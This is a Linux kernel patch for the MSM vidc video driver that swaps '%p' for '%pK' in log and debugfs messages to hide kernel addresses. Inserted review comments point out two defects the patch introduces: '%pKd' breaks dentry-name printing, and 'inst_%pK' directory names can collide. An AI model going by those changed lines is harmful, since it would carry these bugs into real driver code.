MSM_VIDC_START)) { - dprintk(VIDC_INFO, -- "inst: %p is already in state: %d\n", -+ "inst: %pK is already in state: %d\n", - inst, inst->state); - goto exit; - } -@@ -2755,7 +2755,7 @@ static int msm_vidc_stop(int flipped_state, struct msm_vidc_inst *inst) - - if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_STOP)) { - dprintk(VIDC_INFO, -- "inst: %p is already in state: %d\n", -+ "inst: %pK is already in state: %d\n", - inst, inst->state); - goto exit; - } -@@ -2785,7 +2785,7 @@ static int msm_vidc_release_res(int flipped_state, struct msm_vidc_inst *inst) - - if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_RELEASE_RESOURCES)) { - dprintk(VIDC_INFO, -- "inst: %p is already in state: %d\n", -+ "inst: %pK is already in state: %d\n", - inst, inst->state); - goto exit; - } -@@ -2817,7 +2817,7 @@ static int msm_comm_session_close(int flipped_state, - hdev = inst->core->device; - if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_CLOSE)) { - dprintk(VIDC_INFO, -- "inst: %p is already in state: %d\n", -+ "inst: %pK is already in state: %d\n", - inst, inst->state); - goto exit; - } -@@ -3221,16 +3221,16 @@ int msm_comm_try_state(struct msm_vidc_inst *inst, int state) - struct msm_vidc_core *core; - if (!inst) { - dprintk(VIDC_ERR, -- "Invalid instance pointer = %p\n", inst); -+ "Invalid instance pointer = %pK\n", inst); - return -EINVAL; - } - dprintk(VIDC_DBG, -- "Trying to move inst: %p from: %#x to %#x\n", -+ "Trying to move inst: %pK from: %#x to %#x\n", - inst, inst->state, state); - core = inst->core; - if (!core) { - dprintk(VIDC_ERR, -- "Invalid core pointer = %p\n", inst); -+ "Invalid core pointer = %pK\n", inst); - return -EINVAL; - } - mutex_lock(&inst->sync_lock); -@@ -3636,7 +3636,7 @@ int msm_comm_qbuf(struct msm_vidc_inst *inst, struct vb2_buffer *vb) - defer = defer ?: batch_mode && (!output_count || !capture_count); - - if (defer) { -- dprintk(VIDC_DBG, "Deferring queue of %p\n", vb); -+ dprintk(VIDC_DBG, "Deferring queue of %pK\n", vb); - return 0; - } - -@@ 
-3844,7 +3844,7 @@ int msm_comm_try_get_prop(struct msm_vidc_inst *inst, enum hal_property ptype, - */ - - dprintk(VIDC_ERR, -- "In Wrong state to call Buf Req: Inst %p or Core %p\n", -+ "In Wrong state to call Buf Req: Inst %pK or Core %pK\n", - inst, inst->core); - rc = -EAGAIN; - mutex_unlock(&inst->sync_lock); -@@ -3879,7 +3879,7 @@ int msm_comm_try_get_prop(struct msm_vidc_inst *inst, enum hal_property ptype, - msecs_to_jiffies(msm_vidc_hw_rsp_timeout)); - if (!rc) { - dprintk(VIDC_ERR, -- "%s: Wait interrupted or timed out [%p]: %d\n", -+ "%s: Wait interrupted or timed out [%pK]: %d\n", - __func__, inst, - SESSION_MSG_INDEX(HAL_SESSION_PROPERTY_INFO)); - inst->state = MSM_VIDC_CORE_INVALID; -@@ -3919,7 +3919,7 @@ int msm_comm_release_output_buffers(struct msm_vidc_inst *inst) - struct hfi_device *hdev; - if (!inst) { - dprintk(VIDC_ERR, -- "Invalid instance pointer = %p\n", inst); -+ "Invalid instance pointer = %pK\n", inst); - return -EINVAL; - } - mutex_lock(&inst->outputbufs.lock); -@@ -3934,12 +3934,12 @@ int msm_comm_release_output_buffers(struct msm_vidc_inst *inst) - core = inst->core; - if (!core) { - dprintk(VIDC_ERR, -- "Invalid core pointer = %p\n", core); -+ "Invalid core pointer = %pK\n", core); - return -EINVAL; - } - hdev = core->device; - if (!hdev) { -- dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev); -+ dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev); - return -EINVAL; - } - mutex_lock(&inst->outputbufs.lock); -@@ -4035,18 +4035,18 @@ int msm_comm_release_scratch_buffers(struct msm_vidc_inst *inst, - enum hal_buffer sufficiency = HAL_BUFFER_NONE; - if (!inst) { - dprintk(VIDC_ERR, -- "Invalid instance pointer = %p\n", inst); -+ "Invalid instance pointer = %pK\n", inst); - return -EINVAL; - } - core = inst->core; - if (!core) { - dprintk(VIDC_ERR, -- "Invalid core pointer = %p\n", core); -+ "Invalid core pointer = %pK\n", core); - return -EINVAL; - } - hdev = core->device; - if (!hdev) { -- dprintk(VIDC_ERR, "Invalid device 
pointer = %p\n", hdev); -+ dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev); - return -EINVAL; - } - -@@ -4123,18 +4123,18 @@ int msm_comm_release_persist_buffers(struct msm_vidc_inst *inst) - struct hfi_device *hdev; - if (!inst) { - dprintk(VIDC_ERR, -- "Invalid instance pointer = %p\n", inst); -+ "Invalid instance pointer = %pK\n", inst); - return -EINVAL; - } - core = inst->core; - if (!core) { - dprintk(VIDC_ERR, -- "Invalid core pointer = %p\n", core); -+ "Invalid core pointer = %pK\n", core); - return -EINVAL; - } - hdev = core->device; - if (!hdev) { -- dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev); -+ dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev); - return -EINVAL; - } - -@@ -4183,7 +4183,7 @@ int msm_comm_try_set_prop(struct msm_vidc_inst *inst, - int rc = 0; - struct hfi_device *hdev; - if (!inst) { -- dprintk(VIDC_ERR, "Invalid input: %p\n", inst); -+ dprintk(VIDC_ERR, "Invalid input: %pK\n", inst); - return -EINVAL; - } - -@@ -4395,7 +4395,7 @@ void msm_comm_flush_pending_dynamic_buffers(struct msm_vidc_inst *inst) - list_for_each_entry(binfo, &inst->registeredbufs.list, list) { - if (binfo->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) { - dprintk(VIDC_DBG, -- "%s: binfo = %p device_addr = %pa\n", -+ "%s: binfo = %pK device_addr = %pa\n", - __func__, binfo, &binfo->device_addr[0]); - buf_ref_put(inst, binfo); - } -@@ -4414,18 +4414,18 @@ int msm_comm_flush(struct msm_vidc_inst *inst, u32 flags) - struct hfi_device *hdev; - if (!inst) { - dprintk(VIDC_ERR, -- "Invalid instance pointer = %p\n", inst); -+ "Invalid instance pointer = %pK\n", inst); - return -EINVAL; - } - core = inst->core; - if (!core) { - dprintk(VIDC_ERR, -- "Invalid core pointer = %p\n", core); -+ "Invalid core pointer = %pK\n", core); - return -EINVAL; - } - hdev = core->device; - if (!hdev) { -- dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev); -+ dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev); - return -EINVAL; - } - -@@ -4443,7 
+4443,7 @@ int msm_comm_flush(struct msm_vidc_inst *inst, u32 flags) - core->state == VIDC_CORE_INVALID || - core->state == VIDC_CORE_UNINIT) { - dprintk(VIDC_ERR, -- "Core %p and inst %p are in bad state\n", -+ "Core %pK and inst %pK are in bad state\n", - core, inst); - msm_comm_flush_in_invalid_state(inst); - return 0; -@@ -4620,7 +4620,7 @@ int msm_vidc_trigger_ssr(struct msm_vidc_core *core, - int rc = 0; - struct hfi_device *hdev; - if (!core || !core->device) { -- dprintk(VIDC_WARN, "Invalid parameters: %p\n", core); -+ dprintk(VIDC_WARN, "Invalid parameters: %pK\n", core); - return -EINVAL; - } - hdev = core->device; -@@ -4863,7 +4863,7 @@ int msm_comm_kill_session(struct msm_vidc_inst *inst) - change_inst_state(inst, MSM_VIDC_CLOSE_DONE); - } else { - dprintk(VIDC_WARN, -- "Inactive session %p, triggering an internal session error\n", -+ "Inactive session %pK, triggering an internal session error\n", - inst); - msm_comm_generate_session_error(inst); - -@@ -4879,7 +4879,7 @@ struct msm_smem *msm_comm_smem_alloc(struct msm_vidc_inst *inst, - struct msm_smem *m = NULL; - - if (!inst || !inst->core) { -- dprintk(VIDC_ERR, "%s: invalid inst: %p\n", __func__, inst); -+ dprintk(VIDC_ERR, "%s: invalid inst: %pK\n", __func__, inst); - return NULL; - } - m = msm_smem_alloc(inst->mem_client, size, align, -@@ -4891,7 +4891,7 @@ void msm_comm_smem_free(struct msm_vidc_inst *inst, struct msm_smem *mem) - { - if (!inst || !inst->core || !mem) { - dprintk(VIDC_ERR, -- "%s: invalid params: %p %p\n", __func__, inst, mem); -+ "%s: invalid params: %pK %pK\n", __func__, inst, mem); - return; - } - msm_smem_free(inst->mem_client, mem); -@@ -4902,7 +4902,7 @@ int msm_comm_smem_cache_operations(struct msm_vidc_inst *inst, - { - if (!inst || !mem) { - dprintk(VIDC_ERR, -- "%s: invalid params: %p %p\n", __func__, inst, mem); -+ "%s: invalid params: %pK %pK\n", __func__, inst, mem); - return -EINVAL; - } - return msm_smem_cache_operations(inst->mem_client, mem, cache_ops); -@@ 
-4914,7 +4914,7 @@ struct msm_smem *msm_comm_smem_user_to_kernel(struct msm_vidc_inst *inst, - struct msm_smem *m = NULL; - - if (!inst || !inst->core) { -- dprintk(VIDC_ERR, "%s: invalid inst: %p\n", __func__, inst); -+ dprintk(VIDC_ERR, "%s: invalid inst: %pK\n", __func__, inst); - return NULL; - } - -@@ -5055,7 +5055,7 @@ int msm_vidc_comm_s_parm(struct msm_vidc_inst *inst, struct v4l2_streamparm *a) - fps = fps - 1; - - if (inst->prop.fps != fps) { -- dprintk(VIDC_PROF, "reported fps changed for %p: %d->%d\n", -+ dprintk(VIDC_PROF, "reported fps changed for %pK: %d->%d\n", - inst, inst->prop.fps, fps); - inst->prop.fps = fps; - frame_rate.frame_rate = inst->prop.fps * BIT(16); -diff --git a/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c b/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c -index 5e29fb9..b474d48 100644 ---- a/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c -+++ b/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2014 - 2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -47,7 +47,7 @@ static inline int msm_dcvs_count_active_instances(struct msm_vidc_core *core) - struct msm_vidc_inst *inst = NULL; - - if (!core) { -- dprintk(VIDC_ERR, "%s: Invalid args: %p\n", __func__, core); -+ dprintk(VIDC_ERR, "%s: Invalid args: %pK\n", __func__, core); - return -EINVAL; - } - -@@ -95,7 +95,7 @@ static void msm_dcvs_update_dcvs_params(int idx, struct msm_vidc_inst *inst) - struct dcvs_table *table = NULL; - - if (!inst || !inst->core) { -- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst); -+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst); - return; - } - -@@ -160,7 +160,7 @@ static void msm_dcvs_dec_check_and_scale_clocks(struct msm_vidc_inst *inst) - void msm_dcvs_check_and_scale_clocks(struct msm_vidc_inst *inst, bool is_etb) - { - if (!inst) { -- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst); -+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst); - return; - } - -@@ -216,7 +216,7 @@ void msm_dcvs_init_load(struct msm_vidc_inst *inst) - dprintk(VIDC_DBG, "Init DCVS Load\n"); - - if (!inst || !inst->core) { -- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst); -+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst); - return; - } - -@@ -289,7 +289,7 @@ void msm_dcvs_init(struct msm_vidc_inst *inst) - dprintk(VIDC_DBG, "Init DCVS Struct\n"); - - if (!inst) { -- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst); -+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst); - return; - } - -@@ -306,7 +306,7 @@ void msm_dcvs_monitor_buffer(struct msm_vidc_inst *inst) - struct hal_buffer_requirements *output_buf_req; - - if (!inst) { -- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst); -+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst); - return; - } - dcvs = &inst->dcvs; -@@ -315,7 +315,7 @@ void 
msm_dcvs_monitor_buffer(struct msm_vidc_inst *inst) - output_buf_req = get_buff_req_buffer(inst, - msm_comm_get_hal_output_buffer(inst)); - if (!output_buf_req) { -- dprintk(VIDC_ERR, "%s : Get output buffer req failed %p\n", -+ dprintk(VIDC_ERR, "%s : Get output buffer req failed %pK\n", - __func__, inst); - mutex_unlock(&inst->lock); - return; -diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.c b/drivers/media/platform/msm/vidc/msm_vidc_debug.c -index ff29d69..4d4acfa 100644 ---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.c -+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -77,13 +77,13 @@ static ssize_t core_info_read(struct file *file, char __user *buf, - int i = 0, rc = 0; - - if (!core || !core->device) { -- dprintk(VIDC_ERR, "Invalid params, core: %p\n", core); -+ dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core); - return 0; - } - hdev = core->device; - INIT_DBG_BUF(dbg_buf); - write_str(&dbg_buf, "===============================\n"); -- write_str(&dbg_buf, "CORE %d: %p\n", core->id, core); -+ write_str(&dbg_buf, "CORE %d: %pK\n", core->id, core); - write_str(&dbg_buf, "===============================\n"); - write_str(&dbg_buf, "Core state: %d\n", core->state); - rc = call_hfi_op(hdev, get_fw_info, hdev->hfi_device_data, &fw_info); -@@ -153,7 +153,7 @@ struct dentry *msm_vidc_debugfs_init_drv(void) - struct dentry *f = debugfs_create_##__type(__name, S_IRUGO | S_IWUSR, \ - dir, __value); \ - if (IS_ERR_OR_NULL(f)) { \ -- dprintk(VIDC_ERR, "Failed creating debugfs file '%pd/%s'\n", \ -+ dprintk(VIDC_ERR, "Failed creating debugfs file '%pKd/%s'\n", \ - dir, __name); \ - f = NULL; \ - } \ -@@ -204,7 +204,7 @@ struct dentry 
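Review bot: In the debugfs helper macro hunk of msm_vidc_debug.c (`@@ -153,7 +153,7 @@`), the replacement turns `%pd` into `%pKd`, which is no longer the dentry-name specifier. `%pK` consumes `dir` as a plain pointer and the trailing `d` is printed literally, so the error message loses the directory name it was meant to show. `%pd` prints a dentry's name rather than an address, so it was not a leak, and the line should stay `"Failed creating debugfs file '%pd/%s'\n"`. The macro and the enclosing msm_vidc_debugfs_init_drv continue outside the hunk.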
*msm_vidc_debugfs_init_core(struct msm_vidc_core *core, - struct dentry *dir = NULL; - char debugfs_name[MAX_DEBUGFS_NAME]; - if (!core) { -- dprintk(VIDC_ERR, "Invalid params, core: %p\n", core); -+ dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core); - goto failed_create_dir; - } - -@@ -268,15 +268,15 @@ static ssize_t inst_info_read(struct file *file, char __user *buf, - struct msm_vidc_inst *inst = file->private_data; - int i, j; - if (!inst) { -- dprintk(VIDC_ERR, "Invalid params, core: %p\n", inst); -+ dprintk(VIDC_ERR, "Invalid params, core: %pK\n", inst); - return 0; - } - INIT_DBG_BUF(dbg_buf); - write_str(&dbg_buf, "===============================\n"); -- write_str(&dbg_buf, "INSTANCE: %p (%s)\n", inst, -+ write_str(&dbg_buf, "INSTANCE: %pK (%s)\n", inst, - inst->session_type == MSM_VIDC_ENCODER ? "Encoder" : "Decoder"); - write_str(&dbg_buf, "===============================\n"); -- write_str(&dbg_buf, "core: %p\n", inst->core); -+ write_str(&dbg_buf, "core: %pK\n", inst->core); - write_str(&dbg_buf, "height: %d\n", inst->prop.height[CAPTURE_PORT]); - write_str(&dbg_buf, "width: %d\n", inst->prop.width[CAPTURE_PORT]); - write_str(&dbg_buf, "fps: %d\n", inst->prop.fps); -@@ -343,10 +343,10 @@ struct dentry *msm_vidc_debugfs_init_inst(struct msm_vidc_inst *inst, - struct dentry *dir = NULL; - char debugfs_name[MAX_DEBUGFS_NAME]; - if (!inst) { -- dprintk(VIDC_ERR, "Invalid params, inst: %p\n", inst); -+ dprintk(VIDC_ERR, "Invalid params, inst: %pK\n", inst); - goto failed_create_dir; - } -- snprintf(debugfs_name, MAX_DEBUGFS_NAME, "inst_%p", inst); -+ snprintf(debugfs_name, MAX_DEBUGFS_NAME, "inst_%pK", inst); - dir = debugfs_create_dir(debugfs_name, parent); - if (!dir) { - dprintk(VIDC_ERR, "Failed to create debugfs for msm_vidc\n"); -diff --git a/drivers/media/platform/msm/vidc/msm_vidc_res_parse.c b/drivers/media/platform/msm/vidc/msm_vidc_res_parse.c -index 6a98cea..9da2c11 100644 ---- a/drivers/media/platform/msm/vidc/msm_vidc_res_parse.c -+++ 
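Review bot: In the msm_vidc_debugfs_init_inst hunk (`@@ -343,10 +343,10 @@`), `snprintf(debugfs_name, MAX_DEBUGFS_NAME, "inst_%pK", inst)` builds the directory name from a value that `%pK` may replace with zeros. With kptr_restrict enabled, every instance can then get the same name, and `debugfs_create_dir` would fail for the second one, leaving only the "Failed to create debugfs for msm_vidc" message. The name should come from a unique identifier that is not an address. Which field could serve (a session or instance id) is not visible in this hunk, so that needs confirming against the struct. The function body continues outside the hunk.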
b/drivers/media/platform/msm/vidc/msm_vidc_res_parse.c -@@ -1170,7 +1170,7 @@ static int msm_vidc_setup_context_bank(struct context_bank_info *cb, - - dprintk(VIDC_DBG, "Attached %s and created mapping\n", dev_name(dev)); - dprintk(VIDC_DBG, -- "Context bank name:%s, buffer_type: %#x, is_secure: %d, address range start: %#x, size: %#x, dev: %p, mapping: %p", -+ "Context bank name:%s, buffer_type: %#x, is_secure: %d, address range start: %#x, size: %#x, dev: %pK, mapping: %pK", - cb->name, cb->buffer_type, cb->is_secure, cb->addr_range.start, - cb->addr_range.size, cb->dev, cb->mapping); - -@@ -1194,7 +1194,7 @@ int msm_vidc_smmu_fault_handler(struct iommu_domain *domain, - enum vidc_ports port; - - if (!domain || !core) { -- dprintk(VIDC_ERR, "%s - invalid param %p %p\n", -+ dprintk(VIDC_ERR, "%s - invalid param %pK %pK\n", - __func__, domain, core); - return -EINVAL; - } -@@ -1216,7 +1216,7 @@ int msm_vidc_smmu_fault_handler(struct iommu_domain *domain, - !inst->bit_depth ? "8" : "10"); - - dprintk(VIDC_ERR, -- "---Buffer details for inst: %p of type: %d---\n", -+ "---Buffer details for inst: %pK of type: %d---\n", - inst, inst->session_type); - mutex_lock(&inst->registeredbufs.lock); - dprintk(VIDC_ERR, "registered buffer list:\n"); -diff --git a/drivers/media/platform/msm/vidc/venus_boot.c b/drivers/media/platform/msm/vidc/venus_boot.c -index 6e881ab..925c97a 100644 ---- a/drivers/media/platform/msm/vidc/venus_boot.c -+++ b/drivers/media/platform/msm/vidc/venus_boot.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -161,7 +161,7 @@ static int venus_setup_cb(struct device *dev, - return -ENODEV; - } - dprintk(VIDC_DBG, -- "%s Attached device %p and created mapping %p for %s\n", -+ "%s Attached device %pK and created mapping %pK for %s\n", - __func__, dev, venus_data->mapping, dev_name(dev)); - return 0; - } -diff --git a/drivers/media/platform/msm/vidc/venus_hfi.c b/drivers/media/platform/msm/vidc/venus_hfi.c -index ee4e7ae..b6c1f49 100644 ---- a/drivers/media/platform/msm/vidc/venus_hfi.c -+++ b/drivers/media/platform/msm/vidc/venus_hfi.c -@@ -341,7 +341,7 @@ static int __write_queue(struct vidc_iface_q_info *qinfo, u8 *packet, - } - - if (msm_vidc_debug & VIDC_PKT) { -- dprintk(VIDC_PKT, "%s: %p\n", __func__, qinfo); -+ dprintk(VIDC_PKT, "%s: %pK\n", __func__, qinfo); - __dump_packet(packet); - } - -@@ -547,7 +547,7 @@ static int __read_queue(struct vidc_iface_q_info *qinfo, u8 *packet, - *pb_tx_req_is_set = (1 == queue->qhdr_tx_req) ? 
1 : 0; - - if (msm_vidc_debug & VIDC_PKT) { -- dprintk(VIDC_PKT, "%s: %p\n", __func__, qinfo); -+ dprintk(VIDC_PKT, "%s: %pK\n", __func__, qinfo); - __dump_packet(packet); - } - -@@ -574,7 +574,7 @@ static int __smem_alloc(struct venus_hfi_device *dev, - goto fail_smem_alloc; - } - -- dprintk(VIDC_DBG, "__smem_alloc: ptr = %p, size = %d\n", -+ dprintk(VIDC_DBG, "__smem_alloc: ptr = %pK, size = %d\n", - alloc->kvaddr, size); - rc = msm_smem_cache_operations(dev->hal_client, alloc, - SMEM_CACHE_CLEAN); -@@ -595,7 +595,7 @@ fail_smem_alloc: - static void __smem_free(struct venus_hfi_device *dev, struct msm_smem *mem) - { - if (!dev || !mem) { -- dprintk(VIDC_ERR, "invalid param %p %p\n", dev, mem); -+ dprintk(VIDC_ERR, "invalid param %pK %pK\n", dev, mem); - return; - } - -@@ -608,7 +608,7 @@ static void __write_register(struct venus_hfi_device *device, - u32 hwiosymaddr = reg; - u8 *base_addr; - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return; - } - -@@ -622,7 +622,7 @@ static void __write_register(struct venus_hfi_device *device, - } - - base_addr = device->hal_data->register_base; -- dprintk(VIDC_DBG, "Base addr: %p, written to: %#x, Value: %#x...\n", -+ dprintk(VIDC_DBG, "Base addr: %pK, written to: %#x, Value: %#x...\n", - base_addr, hwiosymaddr, value); - base_addr += hwiosymaddr; - writel_relaxed(value, base_addr); -@@ -634,7 +634,7 @@ static int __read_register(struct venus_hfi_device *device, u32 reg) - int rc = 0; - u8 *base_addr; - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return -EINVAL; - } - -@@ -651,7 +651,7 @@ static int __read_register(struct venus_hfi_device *device, u32 reg) - - rc = readl_relaxed(base_addr + reg); - rmb(); -- dprintk(VIDC_DBG, "Base addr: %p, read from: %#x, value: %#x...\n", -+ dprintk(VIDC_DBG, "Base addr: %pK, read from: %#x, value: %#x...\n", - base_addr, reg, 
rc); - - return rc; -@@ -699,7 +699,7 @@ static void __iommu_detach(struct venus_hfi_device *device) - struct context_bank_info *cb; - - if (!device || !device->res) { -- dprintk(VIDC_ERR, "Invalid paramter: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid parameter: %pK\n", device); - return; - } - -@@ -1024,7 +1024,7 @@ static int __set_imem(struct venus_hfi_device *device, struct imem *imem) - int rc = 0; - - if (!device || !device->res || !imem) { -- dprintk(VIDC_ERR, "Invalid params, core: %p, imem: %p\n", -+ dprintk(VIDC_ERR, "Invalid params, core: %pK, imem: %pK\n", - device, imem); - return -EINVAL; - } -@@ -1263,7 +1263,7 @@ static unsigned long venus_hfi_get_core_clock_rate(void *dev, bool actual_rate) - struct clock_info *vc; - - if (!device) { -- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, device); -+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, device); - return -EINVAL; - } - -@@ -1328,7 +1328,7 @@ static int __halt_axi(struct venus_hfi_device *device) - u32 reg; - int rc = 0; - if (!device) { -- dprintk(VIDC_ERR, "Invalid input: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid input: %pK\n", device); - return -EINVAL; - } - -@@ -1526,7 +1526,7 @@ static int venus_hfi_scale_clocks(void *dev, int load, - struct venus_hfi_device *device = dev; - - if (!device) { -- dprintk(VIDC_ERR, "Invalid args: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid args: %pK\n", device); - return -EINVAL; - } - -@@ -2173,7 +2173,7 @@ static int venus_hfi_core_init(void *device) - goto err_core_init; - } - -- dprintk(VIDC_DBG, "Dev_Virt: %pa, Reg_Virt: %p\n", -+ dprintk(VIDC_DBG, "Dev_Virt: %pa, Reg_Virt: %pK\n", - &dev->hal_data->firmware_base, - dev->hal_data->register_base); - -@@ -2293,12 +2293,12 @@ static void __core_clear_interrupt(struct venus_hfi_device *device) - device->intr_status |= intr_status; - device->reg_count++; - dprintk(VIDC_DBG, -- "INTERRUPT for device: %p: times: %d interrupt_status: %d\n", -+ "INTERRUPT for device: %pK: times: %d 
interrupt_status: %d\n", - device, device->reg_count, intr_status); - } else { - device->spur_count++; - dprintk(VIDC_INFO, -- "SPURIOUS_INTR for device: %p: times: %d interrupt_status: %d\n", -+ "SPURIOUS_INTR for device: %pK: times: %d interrupt_status: %d\n", - device, device->spur_count, intr_status); - } - -@@ -2456,7 +2456,7 @@ static void __set_default_sys_properties(struct venus_hfi_device *device) - - static void __session_clean(struct hal_session *session) - { -- dprintk(VIDC_DBG, "deleted the session: %p\n", session); -+ dprintk(VIDC_DBG, "deleted the session: %pK\n", session); - list_del(&session->list); - /* Poison the session handle with zeros */ - *session = (struct hal_session){ {0} }; -@@ -3495,7 +3495,7 @@ static int __response_handler(struct venus_hfi_device *device) - (u32)(uintptr_t)*session_id); - if (!session) { - dprintk(VIDC_ERR, -- "Received a packet (%#x) for an unrecognized session (%p), discarding\n", -+ "Received a packet (%#x) for an unrecognized session (%pK), discarding\n", - info->response_type, - *session_id); - --packet_count; -@@ -3545,7 +3545,7 @@ static void venus_hfi_core_work_handler(struct work_struct *work) - } - - if (!device->callback) { -- dprintk(VIDC_ERR, "No interrupt callback function: %p\n", -+ dprintk(VIDC_ERR, "No interrupt callback function: %pK\n", - device); - goto err_no_work; - } -@@ -3671,7 +3671,7 @@ static inline int __init_clocks(struct venus_hfi_device *device) - struct clock_info *cl = NULL; - - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return -EINVAL; - } - -@@ -3715,7 +3715,7 @@ static inline void __disable_unprepare_clks(struct venus_hfi_device *device) - struct clock_info *cl; - - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return; - } - -@@ -3732,7 +3732,7 @@ static inline int __prepare_enable_clks(struct venus_hfi_device *device) - 
struct clock_info *cl = NULL, *cl_fail = NULL; - int rc = 0; - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return -EINVAL; - } - -@@ -4192,7 +4192,7 @@ static inline int __suspend(struct venus_hfi_device *device) - int rc = 0; - - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return -EINVAL; - } else if (!device->power_enabled) { - dprintk(VIDC_DBG, "Power already disabled\n"); -@@ -4223,7 +4223,7 @@ static inline int __resume(struct venus_hfi_device *device) - int rc = 0; - - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return -EINVAL; - } else if (device->power_enabled) { - dprintk(VIDC_DBG, "Power is already enabled\n"); -@@ -4532,7 +4532,7 @@ static struct venus_hfi_device *__get_device(u32 device_id, - hfi_cmd_response_callback callback) - { - if (!res || !callback) { -- dprintk(VIDC_ERR, "Invalid params: %p %p\n", res, callback); -+ dprintk(VIDC_ERR, "Invalid params: %pK %pK\n", res, callback); - return NULL; - } - -@@ -4610,7 +4610,7 @@ int venus_hfi_initialize(struct hfi_device *hdev, u32 device_id, - int rc = 0; - - if (!hdev || !res || !callback) { -- dprintk(VIDC_ERR, "Invalid params: %p %p %p\n", -+ dprintk(VIDC_ERR, "Invalid params: %pK %pK %pK\n", - hdev, res, callback); - rc = -EINVAL; - goto err_venus_hfi_init; -diff --git a/drivers/media/platform/msm/vidc/vidc_hfi.c b/drivers/media/platform/msm/vidc/vidc_hfi.c -index 16acc47..2dc892c 100644 ---- a/drivers/media/platform/msm/vidc/vidc_hfi.c -+++ b/drivers/media/platform/msm/vidc/vidc_hfi.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -55,7 +55,7 @@ void vidc_hfi_deinitialize(enum msm_vidc_hfi_type hfi_type, - struct hfi_device *hdev) - { - if (!hdev) { -- dprintk(VIDC_ERR, "%s invalid device %p", __func__, hdev); -+ dprintk(VIDC_ERR, "%s invalid device %pK", __func__, hdev); - return; - } - -diff --git a/drivers/media/platform/msm/vidc/vmem/vmem.c b/drivers/media/platform/msm/vidc/vmem/vmem.c -index 3a2ac31..506121a 100644 ---- a/drivers/media/platform/msm/vidc/vmem/vmem.c -+++ b/drivers/media/platform/msm/vidc/vmem/vmem.c -@@ -1,5 +1,4 @@ --/* -- * Copyright (c) 2014-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -127,7 +126,7 @@ static inline u32 __readl(void * __iomem addr) - { - u32 value = 0; - -- pr_debug("read %p ", addr); -+ pr_debug("read %pK ", addr); - value = readl_relaxed(addr); - pr_debug("-> %08x\n", value); - -@@ -136,7 +135,7 @@ static inline u32 __readl(void * __iomem addr) - - static inline void __writel(u32 val, void * __iomem addr) - { -- pr_debug("write %08x -> %p\n", val, addr); -+ pr_debug("write %08x -> %pK\n", val, addr); - writel_relaxed(val, addr); - /* - * Commit all writes via a mem barrier, as subsequent __readl() --- -cgit v1.1 - diff --git 